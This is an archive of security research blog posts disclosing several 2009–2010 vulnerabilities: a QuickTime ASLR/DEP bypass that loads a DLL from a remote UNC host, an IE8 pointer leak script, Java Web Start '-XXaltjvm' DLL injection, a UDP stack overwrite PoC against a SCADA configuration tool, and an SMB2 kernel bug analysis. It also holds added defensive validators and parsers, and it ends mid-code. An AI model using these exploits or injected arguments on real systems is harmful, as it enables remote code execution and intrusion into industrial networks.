eip=27582d6b esp=02c1393c ebp=02c13960 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206
msidcrl40!EnumerateDeviceID+0xa11b:
27582d6b 8b4010 mov eax,dword ptr [eax+10h] ds:0023:15220ccc=295481e8
0:004> t
eax=295481e8 ebx=05ca72a8 ecx=15220cb8 edx=15220d08 esi=15220c20 edi=02c139d0
eip=27582d6e esp=02c1393c ebp=02c13960 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206
msidcrl40!EnumerateDeviceID+0xa11e:
27582d6e 5d pop ebp
0:004> t
eax=295481e8 ebx=05ca72a8 ecx=15220cb8 edx=15220d08 esi=15220c20 edi=02c139d0
eip=27582d6f esp=02c13940 ebp=29527af6 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206
msidcrl40!EnumerateDeviceID+0xa11f:
27582d6f ffe0 jmp eax {WindowsLiveLogin!DllUnregisterServer+0x1f588 (295481e8)}
0:004> t
eax=295481e8 ebx=05ca72a8 ecx=15220cb8 edx=15220d08 esi=15220c20 edi=02c139d0
eip=295481e8 esp=02c13940 ebp=29527af6 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206
WindowsLiveLogin!DllUnregisterServer+0x1f588:
295481e8 ff15f8105029 call dword ptr [WindowsLiveLogin+0x10f8 (295010f8)] ds:0023:295010f8={IEShims!NS_RedirectFiles::APIHook_LoadLibraryA (63e8fbe1)}
0:004> db poi(esp)
15220d08 5c 5c 78 70 6c 38 2e 6e-75 5c 31 00 00 00 00 00 \\xpl8.nu\1.....

p0wn!!

Unfortunately, due to the DLL hijacking fiasco workaround, a LoadLibrary+UNC payload doesn't seem very dangerous... does it? ;) The exploit defeats ASLR+DEP and has been successfully tested on W7, Vista and XP. A Metasploit module should be available soon, since I sent the exploit details to Joshua Drake some days before releasing this advisory. The Metasploit module is already available: https://www.metasploit.com/redmine/projects/framework/repository/entry/modules/exploits/windows/browser/apple_quicktime_marshaled_punk.rb

PoC:
addr = 354552864; // 0x15220C20 [pUnk]
var obj= ' ' +' ' +' ';

Happy hunting!
[0day] Microsoft mshtml.dll CTimeoutEventList::InsertIntoTimeoutList memory leak
(Tuesday, 29 June 2010) Written by Rubén
Hi there! It's been a long time since the last post. This time I'm releasing another 0day, not so critical but interesting indeed. Sometimes exploit writers would kill for a fixed address to pivot from. Nowadays, in the days of ASLR and DEP, any memory leak is welcome. Yesterday, Stefano Di Paola posted the following tweet: http://twitter.com/WisecWisec/status/17254776077 . After elaborating on that weird behaviour I discovered a flaw in mshtml.dll, exploitable via Internet Explorer. In VBScript/JScript there are at least two functions that make use of timers: setTimeout and setInterval. According to the documentation, the return value should be a timer ID. In Chrome and FF this ID is purely sequential (1, 2, 3, 4...) but in IE I was getting "weird" IDs. Later on I discovered that those IDs turned out to be a heap address plus a counter. If your browser is Internet Explorer you can immediately test this flaw by pressing this button.

var i = 1; // counter
function LeakOrDie() {
    var t;
    t = setInterval("foo()", 2000);
    t -= i; // strip the sequential counter, what is left is the leaked address
    document.getElementById('atun').innerHTML = ' Pointer leaked: ' + '0x' + t.toString(16);
    i++;
}
function foo() { return; }

We are leaking a pointer from a segment of IE8's default process heap. But what is that pointer? Why does it increment every time I press the button? Let's see the technical analysis. Inside CWindow's constructor (mshtml's standard) a variable "IDEvent" is initialized to 1:

Module: mshtml.dll Vista SP2
.text:7403EC0A mov dword ptr [ecx+30h], 1 ; TimerID_Counter = 1

Every time a timeout event (created by either setInterval or setTimeout) is created, it's inserted into a list via this function.
Module: mshtml.dll Vista SP2
.text:741170E5 ; public: long __thiscall CTimeoutEventList::InsertIntoTimeoutList(struct TIMEOUTEVENTINFO *, unsigned int *, int)
.text:741170E5 ?InsertIntoTimeoutList@CTimeoutEventList@@QAEJPAUTIMEOUTEVENTINFO@@PAIH@Z proc near
.text:741170E5 ; CODE XREF: CWindow::AddTimeoutCode(tagVARIANT *,ushort *,long,long,uint *)+73p
.text:741170E5 ; CWindow::FireTimeOut(uint)+14DFB8p

Take a look at this code, this is the key:

Module: mshtml.dll Vista SP2
.text:741170E5 ; public: long __thiscall CTimeoutEventList::InsertIntoTimeoutList
[...]
.text:74117100 mov eax, [esi+30h] ; p->IDEvent
.text:74117103 mov ecx, [ebp+arg_0] ; TimerEvent *t;
.text:74117106 add eax, esi ; s = p + p->IDEvent; // Oops!
.text:74117108 mov [ecx+0Ch], eax ; t->ID = s
.text:7411710B inc dword ptr [esi+30h] ; p->IDEvent++

What's going on here? Well, my theory is that in an effort not to return a plain sequential/predictable ID, Microsoft decided to add a "magic" value. Unfortunately, this "magic" value is a pointer member of the CWindow object, which ultimately represents an open browser window. Thus we can define it as persistent in memory even after reloading, until the browser instance is closed. Taking into account that IDEvent is predictable and we know the pointer offset, we can trivially infer the pointer to the persistent CWindow object (leakedPointer - ID_Counter - 0x3c). This brings us useful addresses for ROP/anti-ASLR exploits.
:)

06930dd8 6b0253f8 mshtml!CWindow::`vftable'
06930ddc 00000004
06930de0 00000008
06930de4 070f5720
06930de8 00000000
06930dec 6b028ad8 mshtml!CWindow::`vftable'
06930df0 6b04de30 mshtml!CWindow::`vftable'
06930df4 6aff257c mshtml!CWindow::`vftable'
06930df8 6aff2220 mshtml!CWindow::`vftable'
06930dfc 6aff25a0 mshtml!CWindow::`vftable'
06930e00 068ee3b0
06930e04 00000000
06930e08 068f4aa8
06930e0c 06926be0
06930e10 00000000
06930e14 6b01f5a4 mshtml!CDataAry ::`vftable'
06930e18 00000000
06930e1c 00000000
06930e20 00000000
06930e24 6b01f5a4 mshtml!CDataAry ::`vftable'
06930e28 00000000
06930e2c 00000000
06930e30 00000000
06930e34 6b01f5a4 mshtml!CDataAry ::`vftable'
06930e38 00000000
06930e3c 00000000
06930e40 00000000
06930e44 00000001
06930e48 00000000
06930e4c 00000000
06930e50 00000000
06930e54 00000000

Products affected: XP/Vista/Windows 7, 32/64 bit, IE8. IE9 is not vulnerable. Download the PoC code, elaborate on it as you wish and share it! Happy hunting!
[0DAY] JAVA Web Start Arbitrary command-line injection - "-XXaltjvm" arbitrary dll loading
(Friday, 09 April 2010) Written by Rubén
Updated: Just in case, Tavis' attack also allows remote code execution since the jar is executed without any restriction.

Updated: Although Linux contains vulnerable code, I was unable to exploit it in the same manner. It likely can be exploited by using the proper sequence of command-line arguments, but the sudden release didn't allow me to research this issue. I was focused on Windows at the moment of the disclosure.

Bye bye my little 0day :(, Tavis Ormandy did a great job uncovering a big logic flaw within the Java JRE. I discovered that bug and another that affects every browser a few weeks ago, so I posted the usual "0day++" tweet. The method by which Java Web Start support has been added to the JRE is nothing less than a deliberately embedded backdoor (I really don't think so) or a flagrant case of extreme negligence (+1). It's even more incredible that Sun didn't assess the real risk of this flaw after Tavis reported it to them. They acknowledged it, but didn't consider it suitable for an OOB patch. Let's see:

Java Plugin for Browsers (Chrome, Firefox...)
- Windows: npjp2.dll (the same for IE8's jp2iexp.dll)

.text:6DAA3D96
.text:6DAA3D96 ; =============== S U B R O U T I N E =======================================
.text:6DAA3D96
.text:6DAA3D96 ; Attributes: bp-based frame
.text:6DAA3D96
.text:6DAA3D96 sub_6DAA3D96 proc near ; CODE XREF: sub_6DAA2ACB+170p
.text:6DAA3D96
.text:6DAA3D96 Data = byte ptr -264h
.text:6DAA3D96 var_263 = byte ptr -263h
.text:6DAA3D96 ApplicationName = byte ptr -160h
.text:6DAA3D96 StartupInfo = _STARTUPINFOA ptr -5Ch
.text:6DAA3D96 ProcessInformation = _PROCESS_INFORMATION ptr -18h
.text:6DAA3D96 cbData = dword ptr -8
.text:6DAA3D96 hKey = dword ptr -4
.text:6DAA3D96 arg_0 = dword ptr 8
.text:6DAA3D96 arg_4 = dword ptr 0Ch
.text:6DAA3D96
.text:6DAA3D96 push ebp
.text:6DAA3D97 mov ebp, esp
.text:6DAA3D99 sub esp, 264h
.text:6DAA3D9F push edi
.text:6DAA3DA0 lea eax, [ebp+hKey]
.text:6DAA3DA3 push eax ; phkResult
.text:6DAA3DA4 push 20019h ; samDesired
.text:6DAA3DA9 xor edi, edi
.text:6DAA3DAB push edi ; ulOptions
.text:6DAA3DAC push offset SubKey ; "JNLPFile\\Shell\\Open\\Command"
.text:6DAA3DB1 push 80000000h ; hKey
.text:6DAA3DB6 mov [ebp+cbData], 104h
.text:6DAA3DBD call ds:RegOpenKeyExA
.text:6DAA3DC3 test eax, eax
.text:6DAA3DC5 jz short loc_6DAA3DCE
.text:6DAA3DC7 xor eax, eax
.text:6DAA3DC9 jmp loc_6DAA3F16

The default handler is "javaws.exe". Continuing...
.text:6DAA3EB7 push [ebp+arg_4]
.text:6DAA3EBA push eax
.text:6DAA3EBB push offset aSDocbaseSS ; "\"%s\" -docbase %s %s"
.text:6DAA3EC0 push esi ; LPSTR
.text:6DAA3EC1 call ebx ; wsprintfA
.text:6DAA3EC3 add esp, 14h
.text:6DAA3EC6 jmp short loc_6DAA3ED4
.text:6DAA3EC8 ; ---------------------------------------------------------------------------
.text:6DAA3EC8
.text:6DAA3EC8 loc_6DAA3EC8: ; CODE XREF: sub_6DAA3D96+11Fj
.text:6DAA3EC8 push eax
.text:6DAA3EC9 push offset aSS_0 ; "\"%s\" %s"
.text:6DAA3ECE push esi ; LPSTR
.text:6DAA3ECF call ebx ; wsprintfA
.text:6DAA3ED1 add esp, 10h
.text:6DAA3ED4
.text:6DAA3ED4 loc_6DAA3ED4: ; CODE XREF: sub_6DAA3D96+130j
.text:6DAA3ED4 push 11h
.text:6DAA3ED6 pop ecx
.text:6DAA3ED7 xor eax, eax
.text:6DAA3ED9 lea edi, [ebp+StartupInfo]
.text:6DAA3EDC rep stosd
.text:6DAA3EDE lea eax, [ebp+ProcessInformation]
.text:6DAA3EE1 push eax ; lpProcessInformation
.text:6DAA3EE2 xor ebx, ebx
.text:6DAA3EE4 lea eax, [ebp+StartupInfo]
.text:6DAA3EE7 push eax ; lpStartupInfo
.text:6DAA3EE8 push ebx ; lpCurrentDirectory
.text:6DAA3EE9 push ebx ; lpEnvironment
.text:6DAA3EEA push ebx ; dwCreationFlags
.text:6DAA3EEB push ebx ; bInheritHandles
.text:6DAA3EEC push ebx ; lpThreadAttributes
.text:6DAA3EED push ebx ; lpProcessAttributes
.text:6DAA3EEE push esi ; lpCommandLine
.text:6DAA3EEF lea eax, [ebp+ApplicationName]
.text:6DAA3EF5 push eax ; lpApplicationName
.text:6DAA3EF6 mov [ebp+StartupInfo.cb], 44h
.text:6DAA3EFD call ds:CreateProcessA

So basically the Java browser plugin is running "javaws.exe" without validating command-line parameters. These parameters can be controlled by attackers via specially crafted embed HTML tags within a webpage. Let's see JavaDeploy.txt:

if (browser == 'MSIE') {
    document.write(' ' + ' ' + ' ' + ' ');
} else if (browser == 'Netscape Family') {
    document.write(' ');
}

That's it.
This is how the Java Plugin identifies Java Web Start content (jnlp files). So we can inject command-line parameters through the "docbase" tag and even "launchjnlp". What type of arguments can we abuse to compromise a system? java.exe and javaw.exe support an undocumented, hidden command-line parameter "-XXaltjvm" and, curiously, also "-J-XXaltjvm" (see the -J switch in javaws.exe). This instructs Java to load an alternative JavaVM library (jvm.dll or libjvm.so) from the desired path. Game over. We can set -XXaltjvm=\\IP\evil; in this way javaw.exe will load our evil jvm.dll. Bye bye ASLR, DEP...

Linux

Same logic error, check this function "_Z10launchJNLPPKcS0" in libnpjp2.so:

.text:0000A956 call _fork
.text:0000A95B test eax, eax
.text:0000A95D jnz loc_A813
.text:0000A963 mov [esp+3048h+var_3048], esi
.text:0000A966 lea eax, [ebp+var_3038]
.text:0000A96C mov [esp+3048h+var_3044], eax
.text:0000A970 call _execv

MACOSX

Not vulnerable.

Workaround

Disable javaws/javaws.exe in Linux and Windows by any means. Disable the Deployment Toolkit to avoid unwanted installation, as stated in Tavis' advisory.
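Added example, not code from the post or from Sun: the two wsprintfA format strings shown above ("\"%s\" -docbase %s %s" and "\"%s\" %s") rewritten in Python next to a hardened builder that refuses anything option-like in docbase/launchjnlp before it can reach javaws.exe. The hardened builder is an assumed fix, not the vendor's patch, and JAVAWS is a placeholder path.

```python
"""Embed-parameter validation for the javaws.exe launch described in the post.

Added example, not Sun's code or patch. vulnerable_cmdline() mirrors the two
wsprintfA format strings in npjp2.dll; hardened_argv() is an assumed fix that
keeps -docbase in a fixed position and refuses values that would become javaws
options such as -XXaltjvm / -J-XXaltjvm. JAVAWS is a placeholder path.
"""
from typing import List, Optional
from urllib.parse import urlsplit

JAVAWS = r"C:\Program Files\Java\jre6\bin\javaws.exe"   # placeholder, not a real install path


def vulnerable_cmdline(docbase: Optional[str], launchjnlp: str) -> str:
    """Same shape as the plugin: attacker-controlled values pasted into a format string."""
    if docbase:
        return '"%s" -docbase %s %s' % (JAVAWS, docbase, launchjnlp)
    return '"%s" %s' % (JAVAWS, launchjnlp)


class RejectedParameter(ValueError):
    """Raised when an embed parameter cannot be handed to javaws safely."""


def validate_url_param(name: str, value: str) -> str:
    """Accept only a single http(s) URL token; anything option-like is refused."""
    value = value.strip()
    if not value or value.startswith("-"):
        # A leading dash turns the value into a javaws option (e.g. -J-XXaltjvm=...).
        raise RejectedParameter(f"{name}: option-like value {value!r}")
    if any(c.isspace() for c in value) or "\x00" in value or '"' in value:
        # Whitespace or quotes would split the token into extra arguments.
        raise RejectedParameter(f"{name}: value would split into several arguments {value!r}")
    parts = urlsplit(value)
    if parts.scheme not in ("http", "https") or not parts.netloc:
        # Also rejects UNC paths (\\host\share), the delivery path for an alternative jvm.dll.
        raise RejectedParameter(f"{name}: not an http(s) URL {value!r}")
    return value


def hardened_argv(docbase: Optional[str], launchjnlp: str) -> List[str]:
    """argv for a CreateProcess-style launch: fixed option positions, validated values."""
    argv = [JAVAWS]
    if docbase:
        argv += ["-docbase", validate_url_param("docbase", docbase)]
    argv.append(validate_url_param("launchjnlp", launchjnlp))
    return argv


def injection_attempted(docbase: Optional[str], launchjnlp: str) -> bool:
    """True when the hardened builder would refuse the values (useful as a log signal)."""
    try:
        hardened_argv(docbase, launchjnlp)
    except RejectedParameter:
        return True
    return False


if __name__ == "__main__":
    # Constructed values: a normal JNLP launch and an option smuggled through docbase.
    good = ("http://apps.example.invalid/", "http://apps.example.invalid/app.jnlp")
    bad = ("-J-XXaltjvm=\\\\evil.example.invalid\\share", "http://apps.example.invalid/app.jnlp")
    print(vulnerable_cmdline(*bad))     # the option reaches the command line untouched
    print(hardened_argv(*good))
    print(injection_attempted(*bad))    # True
```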
Changes in PspIsDescriptorValid
(Wednesday, 07 April 2010) Written by Rubén
Hi there. You should read these articles before continuing: Derek Soeder's LDT expand-down vulnerability, my "VMware #GP Kernel DoS" advisory and z0mbie's article on LDT entries. Just sharing a curious thing I've found in a diffing session. Within the kernel, PspIsDescriptorValid has changed in Vista and later. The code in charge of checking base+limit against kernel addresses is no longer present.

XP kernel
PAGE:00556115 loc_556115: ; CODE XREF: PspIsDescriptorValid(x)+76j
PAGE:00556115 add eax, edi
PAGE:00556117 cmp edi, eax
PAGE:00556119 ja short loc_55612B
PAGE:0055611B cmp eax, _MmHighestUserAddress
PAGE:00556121 ja short loc_55612B

This means that we can create LDT descriptors (via NtSetLdtEntries) with arbitrary base and limit. This is not a big deal since the kernel seems to be correctly changing user-mode selectors in every Ring3-Ring0 transition (SYSENTER, page faults...). But what about others? i.e. security software that might be implementing insecure SYSENTER hooking without sanitizing segment selectors obtained from user mode. Can you spot an exploitation vector? Share it if so! Thanks and kudos to Derek Soeder. From time to time we can enjoy his advisories...
Exposing HMS HICP Protocol + 0Day 'light' + SCADA_SHODAN
(Monday, 14 December 2009) Written by Rubén
I'll be conducting a Reverse Engineering Training (8 hours = 1 day) within the context of the RootedCON Security Conference on March 15, 2010. RootedCON 2010 will take place at the Auditorium inside the "Centro de Convenciones Mapfre", in Madrid, Spain (Europe :P), on March 18-20, 2010. More info: http://www.rootedcon.es

Reversemode 2.0 hehe, http://www.twitter.com/reversemode

Hi all, after a long period of inactivity I'm back with fresh content. Today we are going to reverse a simple proprietary M2M protocol developed by the Swedish company HMS. In addition to this, a related 0day will be disclosed and finally we'll learn how to find SCADA systems with the help of the new toy: SHODAN.

1st PART "HMS HICP Protocol"

AFAIK there is no public documentation about this protocol; if that's not so please let me know and I'll repeatedly hit myself with a sharpened stick. All the information presented here has obviously been obtained by reverse engineering. Despite the fact that this protocol is not complex, I think it is of potential interest regarding SCADA security. You'll see why. HICP is intended to configure HMS products that include Ethernet capabilities, since they need a method for configuring the internal IP, DHCP, network mask, DNS, gateway... In 2004 HMS released a free tool named "Anybus IPconfig" which can be used to scan a network where the devices are connected and then configure them. The components of this application are a simple MFC-based GUI and a DLL (hicp.dll).
So let's take a look at the exports:

Code (asm)
.text:100027AF ; int __cdecl HICP_SendModuleScan()
.text:100027AF public ?HICP_SendModuleScan@@YAHXZ
.text:100027AF ?HICP_SendModuleScan@@YAHXZ proc near
.text:100027AF push ebp
.text:100027B0 mov ebp, esp
.text:100027B2 call sub_10002175
.text:100027B7 pop ebp
.text:100027B8 retn
.text:100027B8 ?HICP_SendModuleScan@@YAHXZ endp

In C:

Code (c)
sprintf(&Dest, "Module Scan");
to.sa_family = AF_INET;
*(_WORD *)&to.sa_data[0] = htons(HICP_PORT);      // 3250 UDP
*(_DWORD *)&to.sa_data[2] = htonl(IP_BROADCAST);
v1 = strlen(&Dest);
if ( sendto(s, &Dest, v1 + 1, 0, &to, 16) != -1 )

So we can see that in order to scan the network this tool sends a broadcast UDP packet containing the string "Module Scan" to the HICP port (3250). Inside HMS AnyBus-based devices we can find a hicp daemon listening on port 3250. Once the device receives that packet it broadcasts a reply, which contains its current configuration, to the network on port 3250. The configuration tool listens on this port as well. Let's see what parameters can be configured via this protocol. Any value after the '=' can be modified.

+ "Protocol version = 1.10; "   # Obvious
+ "fb type = EVIL-DEVICE; "     # Device type
+ "module version = 0.66.6; "   # ...
+ "mac = 00-30-11-00-CA-FE; "   # MAC
+ "ip = 192.168.1.252; "        # ...
+ "sn = 255.255.255.0; "        # Network mask
+ "gw = 192.168.1.1; "          # Gateway
+ "dhcp = off; "                # whether the device is using a DHCP server for obtaining the IP address (on/off)
+ "pswd = off; "                # whether the device is using a password (on/off)
+ "hn = morroBufalo; "          # hostname (optional)
+ "dns1 = 192.168.1.33; "       # Primary DNS
+ "dns2 = 192.168.1.34; "       # Secondary DNS (optional)
+ "password = admin; "          # old password (if any, admin by default)
+ "new password = fatbird; "    # new password

These parameters are sent via UDP in plain text, concatenated and separated by a ";". If you want to configure a device you need to prepend a "Configure:" string in this way: "Configure: xx-xx-xx-xx-xx-xx;" + parameters_string, where xx-xx-xx-xx-xx-xx is the MAC of the device you want to configure. You can take a look at the HICP_SendConfigure code to verify it. This request is broadcast, so it is received by any device/machine in the network listening on 3250/UDP. The device checks the MAC against its own and, if it matches, proceeds to update its internal registers. The first three bytes of the MAC are always 00-30-11, which correspond to HMS' OUI as expected. In addition to this request, there are a couple of additional replies implemented:

+ "Invalid Password:" to indicate a failed configuration attempt
+ "Reconfigured:" to indicate success.

That's all. Make your own conclusions about the security level of this protocol. I'm just presenting facts.

2nd PART "Intellicom NetBiterConfig.exe Remote Stack Overwrite". 0day Light.

Another Swedish company this time. Intellicom develops a series of SCADA products/devices named NetBiter WebSCADA which are based on the HMS AnyBus RemoteCOM device. We can download the firmware, as well as two tools to configure and update these devices respectively. Free goods are always nice. First off, taking a look at the GUI of the tool for configuring devices, NetBiterConfig.exe, we can see that it looks pretty similar to the HMS one. Except for a couple of added buttons, one to "wink" a device and the other to start an "emergency" DHCP server, the tool contains the same components: hicp.dll and an MFC GUI.
However, this one contains a surprise. OK, NetBiterConfig.exe is listening on 3250/UDP, receiving packets on any interface, so we can send a specially crafted UDP packet from outside the network to trick the tool into thinking we are a NetBiter device. If we fill the "hn" parameter (hostname) with more than 0x20 bytes, we start to overwrite data on the stack. By constructing a hostname of 0x60 bytes we can overwrite a pointer to a vtable of the application's subclassing methods; this can be used to achieve code execution by emulating a vtable under our control. 0x60 is not an arbitrary value; it allows us to get %esi pointing to the last 0x20 (approximately) bytes of our shellcode. The flaw is triggered when the admin double-clicks on the list box item. The flaw is a classic strcpy without proper bounds checking in NetBiterConfig.exe:

Code (asm)
.text:00403E52 lea edx, [ebp-0ABh]
.text:00403E58 push edx ; evil hostname
.text:00403E59 lea eax, [ebp-3CCh]
.text:00403E5F push eax
.text:00403E60 call strcpy

The flaw does not exist in AnybusIpconfig.exe since it uses "strncpy":

Code (asm)
.text:00403691 push 80h
.text:00403696 lea eax, [esp+0E1h]
.text:0040369D push eax
.text:0040369E lea ecx, [esp+494h]
.text:004036A5 push 80h
.text:004036AA push ecx
.text:004036AB mov byte ptr [esp+530h], 1
.text:004036B3 call sub_425666
....
....
.text:004256D9 mov cl, [edx]
.text:004256DB mov [eax], cl
.text:004256DD inc eax
.text:004256DE inc edx
.text:004256DF cmp cl, bl
.text:004256E1 jz short loc_4256EB
.text:004256E3 dec edi
.text:004256E4 jz short loc_4256EB
.text:004256E6 dec [ebp+arg_C]
.text:004256E9 jnz short loc_4256D9

I have not contacted the vendor because I don't feel like it. I am tired of having to explain a highly technical issue to a customer support agent who will be thinking for sure "WTF?!?". I've got a new ethic rule: "No explicit security contact publicly available + no money involved (I'm used to eating almost three times a day) == 0day".

PoC

Code (python)
#!/usr/bin/python
# Intellicom NetBiterConfig.exe 1.3.0 Remote Stack Overwrite.
# Ruben Santamarta - www.reversemode.com
# For research purposes ONLY.
# If you use this code to cause damage I'll cut you open like a f***ing pig.
import sys
import socket

s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("10.10.10.10", 3250))
s.send("protocol version = 1.10; "
       + "fb type = EVIL-DEVICE; "
       + "module version = 0.66.6; "
       + "mac = 00-30-11-00-BA-CA; "
       + "ip = 192.168.1.52; "
       + "sn = 255.255.255.0; "
       + "gw = 192.168.1.1; "
       + "dhcp = off; "
       + "pswd = off; "
       + "hn = " + "A" * 0x60 + "; "   # hostname longer than the 0x20-byte buffer
       + "dns1 = 192.168.1.33;")

Another interesting thing is that you can download the firmware for free. The firmware is a .bin file comprised of a 0x5F-byte header, which includes a magic 'NBU' + MajorMinorVersion + ImageSize + Checksum + VersionString, followed by a plain gz file, so if we cut off the header we can decompress the remaining gz file. Cool. The firmware is a custom Linux for the Motorola ColdFire processor.
It contains interesting stuff like default passwords...

3rd PART "SHODAN is in da house"

This means... SCADA systems. Watch out! Don't mess with this type of system if you don't know what you are really doing. I am not responsible in any manner for any damage you may cause.
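Added example, not code from HMS, Intellicom or the post: a parser for the HICP framing described in the 1st part ("Module Scan", "Configure: <mac>;", "key = value;" pairs, the "Invalid Password:"/"Reconfigured:" replies) with the checks a monitor on 3250/UDP would run, including the over-long "hn" field from the 2nd part. The 0x20-byte hostname limit and the 00-30-11 OUI come from the post; the datagrams below are constructed, not captured.

```python
"""HICP (3250/UDP) datagram parser with defensive checks.

Added example, not code from HMS, Intellicom or the original post. Framing and
field names follow the post; HN_MAX is the hostname buffer size the post gives
for NetBiterConfig.exe. Sample datagrams below are constructed.
"""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

HICP_PORT = 3250                 # scan, reply and configure all travel on 3250/UDP
HMS_OUI = "00-30-11"             # leading MAC bytes of HMS AnyBus devices
HN_MAX = 0x20                    # hostname buffer overwritten past this length
MAC_RE = re.compile(r"^[0-9A-Fa-f]{2}(?:-[0-9A-Fa-f]{2}){5}$")
IP_FIELDS = ("ip", "sn", "gw", "dns1", "dns2")


@dataclass
class HicpMessage:
    kind: str                              # scan | configure | status | reply
    target_mac: Optional[str] = None       # MAC named in a "Configure:" request
    fields: Dict[str, str] = field(default_factory=dict)
    alerts: List[str] = field(default_factory=list)


def parse_fields(body: str) -> Dict[str, str]:
    """Split 'key = value; key = value;' into a dict (keys lower-cased)."""
    out: Dict[str, str] = {}
    for item in body.split(";"):
        key, sep, value = item.partition("=")
        if sep:
            out[key.strip().lower()] = value.strip()
    return out


def valid_ipv4(value: str) -> bool:
    parts = value.split(".")
    return len(parts) == 4 and all(p.isdigit() and 0 <= int(p) <= 255 for p in parts)


def check_message(msg: HicpMessage) -> List[str]:
    """Checks a passive monitor would apply to one datagram."""
    alerts: List[str] = []
    hn = msg.fields.get("hn", "")
    if len(hn) > HN_MAX:
        alerts.append(f"hn is {len(hn)} bytes (limit {HN_MAX:#x}): "
                      "possible NetBiterConfig.exe stack overwrite")
    for mac in (m for m in (msg.fields.get("mac"), msg.target_mac) if m):
        if not MAC_RE.match(mac):
            alerts.append(f"malformed MAC {mac!r}")
        elif not mac.upper().startswith(HMS_OUI):
            alerts.append(f"MAC {mac} is outside the HMS OUI {HMS_OUI}")
    for key in IP_FIELDS:
        if key in msg.fields and not valid_ipv4(msg.fields[key]):
            alerts.append(f"{key} is not a dotted-quad address: {msg.fields[key]!r}")
    if msg.kind == "configure":
        if "new password" in msg.fields:
            alerts.append("password change sent in cleartext over broadcast UDP")
        alerts.append("device reconfiguration request (cleartext password is the only gate)")
    return alerts


def parse_hicp(datagram: bytes) -> HicpMessage:
    """Classify one HICP datagram and attach the alerts from check_message()."""
    text = datagram.split(b"\x00", 1)[0].decode("latin-1")
    if text.strip() == "Module Scan":
        msg = HicpMessage("scan")
    elif text.startswith("Configure:"):
        mac, _, rest = text[len("Configure:"):].partition(";")
        msg = HicpMessage("configure", target_mac=mac.strip(), fields=parse_fields(rest))
    elif text.startswith(("Invalid Password:", "Reconfigured:")):
        msg = HicpMessage("status", fields=parse_fields(text.partition(":")[2]))
    else:
        msg = HicpMessage("reply", fields=parse_fields(text))
    msg.alerts = check_message(msg)
    return msg


# Constructed sample datagrams (not captured traffic).
BENIGN_REPLY = (b"Protocol version = 1.10; fb type = EVIL-DEVICE; module version = 0.66.6; "
                b"mac = 00-30-11-00-CA-FE; ip = 192.168.1.252; sn = 255.255.255.0; "
                b"gw = 192.168.1.1; dhcp = off; pswd = off; hn = morroBufalo; "
                b"dns1 = 192.168.1.33;\x00")
OVERLONG_REPLY = BENIGN_REPLY.replace(b"hn = morroBufalo;", b"hn = " + b"A" * 0x60 + b";")
CONFIGURE_REQ = (b"Configure: 00-30-11-00-CA-FE; ip = 192.168.1.250; sn = 255.255.255.0; "
                 b"gw = 192.168.1.1; password = admin; new password = fatbird;\x00")

if __name__ == "__main__":
    for name, pkt in (("benign reply", BENIGN_REPLY), ("overlong hn", OVERLONG_REPLY),
                      ("configure", CONFIGURE_REQ)):
        msg = parse_hicp(pkt)
        print(f"{name}: kind={msg.kind} alerts={msg.alerts}")
```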
Regarding SMB2.0 Negotiate BSOD published by Laurent Gaffié
(Tuesday, 08 September 2009) Written by Rubén
Today I woke up to an advisory published by Laurent Gaffié where a possible BSOD is announced. The advisory does not provide any technical detail and is only based on empirical results, so it needs to be verified. This is the result of my brief research. Change DoS to Remote Code Execution and Local Privilege Escalation. Why?

Module: srv2.sys
Code (asm)
; int __stdcall Smb2ValidateProviderCallback(PVOID DestinationBuffer)
_Smb2ValidateProviderCallback@4 proc near
...
...
.text:000156B3 loc_156B3: ; CODE XREF: Smb2ValidateProviderCallback(x)+4D5j
.text:000156B3 ; Smb2ValidateProviderCallback(x)+4DEj
.text:000156B3 movzx eax, word ptr [esi+0Ch] ; packet->SMB_Header->Process_ID_High
.text:000156B7 mov eax, _ValidateRoutines[eax*4] ; BUG - out-of-bounds dereference.
.text:000156BE test eax, eax
.text:000156C0 jnz short loc_156C9
.text:000156C2 mov eax, 0C0000002h
.text:000156C7 jmp short loc_156CC
.text:000156C9 ; ---------------------------------------------------------------------------
.text:000156C9
.text:000156C9 loc_156C9: ; CODE XREF: Smb2ValidateProviderCallback(x)+4F3j
.text:000156C9 push ebx
.text:000156CA call eax ; Smb2ValidateNegotiate(x) - KABOOOM!!

As you can see, [ESI+0xC] points to our packet, exactly to the ProcessIDHigh header field, whose size is 16 bits. We can fully control this value. Later on this value is used as an index into the function pointer table _ValidateRoutines. Classic bug: an out-of-bounds dereference, since the code is not checking the size of the table before dereferencing the function pointer. This is the reason why this vulnerability is a Remote Code Execution and not only a DoS. And this is the reason why the exploit provided may or may not crash a machine.
If the page pointed to by the index is invalid the system will BSOD; otherwise it might crash at another point or simply not crash. How to exploit it? We see that ESI points to our packet; in addition, this function table is located in .data, which is located before the PAGE section addresses, so we can dereference a pointer in that area as well. We "only" need to find a suitable pointer to control the execution. Vulnerable systems: Vista, 7 RC and < 2008 Server R2 according to Microsoft. Stay tuned, I'll post any further development regarding this issue. More info on the blog (Castilian) where I collaborate: http://blog.48bits.com
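Added example, not code from the post or from Microsoft: a checker for the field the analysis above points at. It parses the 32-byte SMB1 header that carries a client's first negotiate (MS-CIFS layout: Command at offset 4, ProcessIdHigh at offset 12) and flags a NEGOTIATE whose ProcessIdHigh is non-zero, the 16-bit value Smb2ValidateProviderCallback uses unchecked as an index into _ValidateRoutines. The negotiate packets are constructed inline, not captures, and 0x1234 is an arbitrary constructed value.

```python
"""Flag SMB NEGOTIATE requests with a non-zero ProcessIdHigh.

Added example, not the post's or Microsoft's code. Offsets follow the SMB1
(MS-CIFS) header: magic \\xffSMB, Command at 4, Status at 5, Flags at 9,
Flags2 at 10, ProcessIdHigh at 12, TID/PIDLow/UID/MID at 24..31. The field at
offset 12 is the one the post shows being used as an unchecked table index.
Packets below are constructed for the demo.
"""
import struct
from typing import Dict, List, Optional, Tuple

SMB1_MAGIC = b"\xffSMB"
SMB_COM_NEGOTIATE = 0x72
HDR_LEN = 32


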